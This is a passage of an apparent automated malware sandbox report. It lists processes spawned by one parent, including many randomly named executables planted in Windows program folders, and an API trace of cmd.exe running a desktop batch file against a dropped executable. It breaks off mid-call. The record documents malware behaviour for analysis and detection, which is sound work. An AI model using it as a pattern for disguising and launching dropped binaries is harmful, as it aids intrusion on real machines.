"NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 539 os_tid = 0xbb0 Thread: id = 540 os_tid = 0x948 Process: id = "112" image_name = "spcwin.exe" filename = "c:\\program files\\microsoft analysis services\\spcwin.exe" page_root = "0x6309e000" os_pid = "0x954" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\" " cur_dir = "C:\\Program Files\\Microsoft Analysis Services\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 541 os_tid = 0xbac Thread: id = 542 os_tid = 0x958 Process: id = "113" image_name = "spgagentservice.exe" filename = "c:\\program files (x86)\\windows photo viewer\\spgagentservice.exe" page_root = "0x645b1000" os_pid = "0x964" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\spgagentservice.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 543 os_tid = 0xba8 Thread: id = 544 os_tid = 0x968 Process: id = "114" image_name = "utg2.exe" filename = "c:\\program files\\windows nt\\utg2.exe" page_root = "0x647c4000" os_pid = "0x974" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows NT\\utg2.exe\" " cur_dir = "C:\\Program Files\\Windows NT\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 545 os_tid = 0xba4 Thread: id = 546 os_tid = 0x978 Process: id = "115" image_name = "canberraimagineamendments.exe" filename = "c:\\program files (x86)\\common files\\canberraimagineamendments.exe" page_root = "0x62fd7000" os_pid = "0x984" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Common Files\\canberraimagineamendments.exe\" " cur_dir = "C:\\Program Files (x86)\\Common Files\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 547 os_tid = 0xba0 Thread: id = 548 os_tid = 0x988 Process: id = "116" image_name = "twelve.exe" filename = "c:\\program files (x86)\\windows portable devices\\twelve.exe" page_root = "0x634eb000" os_pid = "0x994" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Portable Devices\\twelve.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Portable Devices\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 549 os_tid = 0xb9c Thread: id = 550 os_tid = 0x998 Process: id = "117" image_name = "tank-preferred.exe" filename = "c:\\program files\\internet explorer\\tank-preferred.exe" page_root = "0x63207000" os_pid = "0x9a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Internet Explorer\\tank-preferred.exe\" " cur_dir = "C:\\Program Files\\Internet Explorer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 551 os_tid = 0xb98 Thread: id = 552 os_tid = 0x9a8 Process: id = "118" image_name = "sick-sender-plots.exe" filename = "c:\\program files\\common files\\sick-sender-plots.exe" page_root = "0x62621000" os_pid = "0x9b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Common Files\\sick-sender-plots.exe\" " cur_dir = "C:\\Program Files\\Common Files\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 553 os_tid = 0xb94 Thread: id = 554 os_tid = 0x9b8 Process: id = "119" image_name = "sufficiently_awarded.exe" filename = "c:\\program files\\windows portable devices\\sufficiently_awarded.exe" page_root = "0x62444000" os_pid = "0x9c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\sufficiently_awarded.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 555 os_tid = 0xb90 Thread: id = 556 os_tid = 0x9c8 Process: id = "120" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x62a64000" os_pid = "0x9f4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 557 os_tid = 0x3d4 Thread: id = 558 os_tid = 0xa14 Thread: id = 559 os_tid = 0xa10 Thread: id = 560 os_tid = 0xa0c Thread: id = 561 os_tid = 0xa08 Thread: id = 562 os_tid = 0xa04 Thread: id = 563 os_tid = 0x9fc Thread: id = 564 os_tid = 0x9f8 Thread: id = 693 os_tid = 0xb2c Process: id = "121" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61b69000" os_pid = "0xa1c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00045574" [0xc000000f] Thread: id = 565 os_tid = 0x418 Thread: id = 566 os_tid = 0xa44 Thread: id = 567 os_tid = 0xa3c Thread: id = 568 os_tid = 0xa38 Thread: id = 569 os_tid = 0xa34 Thread: id = 570 os_tid = 0xa30 Thread: id = 571 os_tid = 0xa2c Thread: id = 572 os_tid = 0xa24 Thread: id = 573 os_tid = 0xa20 Thread: id = 686 os_tid = 0xa40 Process: id = "122" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x5d313000" os_pid = "0xb40" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "taskhost.exe $(Arg0)" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT TASK\\Microsoft-Windows-SideShow-AutoWake" [0xe], "NT TASK\\Microsoft-Windows-SideShow-SystemDataProviders" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-UsbCeip" [0xe], "NT TASK\\Microsoft-Windows-Ras-MobilityManager" [0xe], "NT TASK\\Microsoft-Windows-PerfTrack-BackgroundConfigSurveyor" [0xe], "NT TASK\\Microsoft-Windows-RAC-RacTask" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-KernelCeipTask" [0xe], "NT AUTHORITY\\Logon Session 00000000:00057520" [0xc0000007], "LOCAL" [0x7] Thread: id = 574 os_tid = 0xb80 Thread: id = 575 os_tid = 0xb7c Thread: id = 576 os_tid = 0xb78 Thread: id = 577 os_tid = 0xb74 Thread: id = 578 os_tid = 0xb70 Thread: id = 579 os_tid = 0xb6c Thread: id = 580 os_tid = 0xb68 Thread: id = 581 os_tid = 0xb60 Thread: id = 582 os_tid = 0xb54 Thread: id = 583 os_tid = 0xb50 Thread: id = 584 os_tid = 0xb48 Thread: id = 585 os_tid = 0xb44 Thread: id = 779 os_tid = 0xb10 Process: id = "123" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x42482000" os_pid = "0xa4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 586 os_tid = 0x618 Thread: id = 587 os_tid = 0x9f0 Process: id = "124" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4218f000" os_pid = "0x730" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 588 os_tid = 0x244 Thread: id = 589 os_tid = 0x20c Process: id = "125" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3f49e000" os_pid = "0x84c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 590 os_tid = 0x8cc Thread: id = 591 os_tid = 0x88c Thread: id = 592 os_tid = 0x85c Process: id = "126" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x404a9000" os_pid = "0x644" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 593 os_tid = 0xb3c Thread: id = 594 os_tid = 0xb18 Process: id = "127" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3d7b5000" os_pid = "0xae0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 595 os_tid = 0xb14 Thread: id = 596 os_tid = 0xacc Process: id = "128" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3bb20000" os_pid = "0xa74" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\FontCache" [0xe], "NT SERVICE\\Mcx2Svc" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TBS" [0xa], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0005fb11" [0xc000000f], "LOCAL" [0x7] Thread: id = 597 os_tid = 0x174 Thread: id = 598 os_tid = 0x78c Thread: id = 599 os_tid = 0x5e0 Thread: id = 600 os_tid = 0x6ec Thread: id = 601 os_tid = 0xaa0 Thread: id = 602 os_tid = 0xaa4 Thread: id = 647 os_tid = 0x158 Process: id = "129" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3bbc1000" os_pid = "0xaf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 603 os_tid = 0xaf4 Thread: id = 604 os_tid = 0xab8 Process: id = "130" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3b5c9000" os_pid = "0x91c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 605 os_tid = 0x358 Thread: id = 606 os_tid = 0x410 Process: id = "131" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x38a2b000" os_pid = "0x304" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\sppsvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:00062e85" [0xc000000f], "LOCAL" [0x7] Thread: id = 607 os_tid = 0xb0c Thread: id = 613 os_tid = 0xac0 Thread: id = 616 os_tid = 0xb8c Thread: id = 618 os_tid = 0xa9c Thread: id = 628 os_tid = 0x6d8 Thread: id = 676 os_tid = 0x388 Thread: id = 679 os_tid = 0xb00 Process: id = "132" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x38219000" os_pid = "0x7b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\executed_florists.exe\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 608 os_tid = 0x570 [0133.036] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf834 | out: lpSystemTimeAsFileTime=0x2cf834*(dwLowDateTime=0x118b0680, dwHighDateTime=0x1d68287)) [0133.036] GetCurrentProcessId () returned 0x7b0 [0133.036] GetCurrentThreadId () returned 0x570 [0133.036] GetTickCount () returned 0x1151cc5 [0133.036] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf82c | out: lpPerformanceCount=0x2cf82c*=25337479056) returned 1 [0133.040] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0133.040] __set_app_type (_Type=0x1) [0133.040] __p__fmode () returned 0x770331f4 [0133.040] __p__commode () returned 0x770331fc [0133.041] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0133.041] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0133.041] GetCurrentThreadId () returned 0x570 [0133.041] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x570) returned 0x60 [0133.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0133.041] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0133.042] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.042] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.042] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf7c4 | out: phkResult=0x2cf7c4*=0x0) returned 0x2 [0133.042] VirtualQuery (in: lpAddress=0x2cf7fb, lpBuffer=0x2cf794, dwLength=0x1c | out: lpBuffer=0x2cf794*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.042] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf794, dwLength=0x1c | out: lpBuffer=0x2cf794*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.042] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf794, dwLength=0x1c | out: lpBuffer=0x2cf794*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.042] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf794, dwLength=0x1c | out: lpBuffer=0x2cf794*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.042] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf794, dwLength=0x1c | out: lpBuffer=0x2cf794*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0133.042] GetConsoleOutputCP () returned 0x1b5 [0133.043] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0133.043] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0133.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.043] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0133.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.043] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0133.044] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.044] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.044] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.044] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0133.044] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.045] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0133.045] GetEnvironmentStringsW () returned 0x3020e8* [0133.045] GetProcessHeap () returned 0x2f0000 [0133.045] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xaca) returned 0x302bc0 [0133.045] FreeEnvironmentStringsW (penv=0x3020e8) returned 1 [0133.045] GetProcessHeap () returned 0x2f0000 [0133.045] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4) returned 0x301888 [0133.045] GetEnvironmentStringsW () returned 0x3020e8* [0133.046] GetProcessHeap () returned 0x2f0000 [0133.046] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xaca) returned 0x303698 [0133.046] FreeEnvironmentStringsW (penv=0x3020e8) returned 1 [0133.046] RegOpenKeyExW (in: hKey=0x80000002, 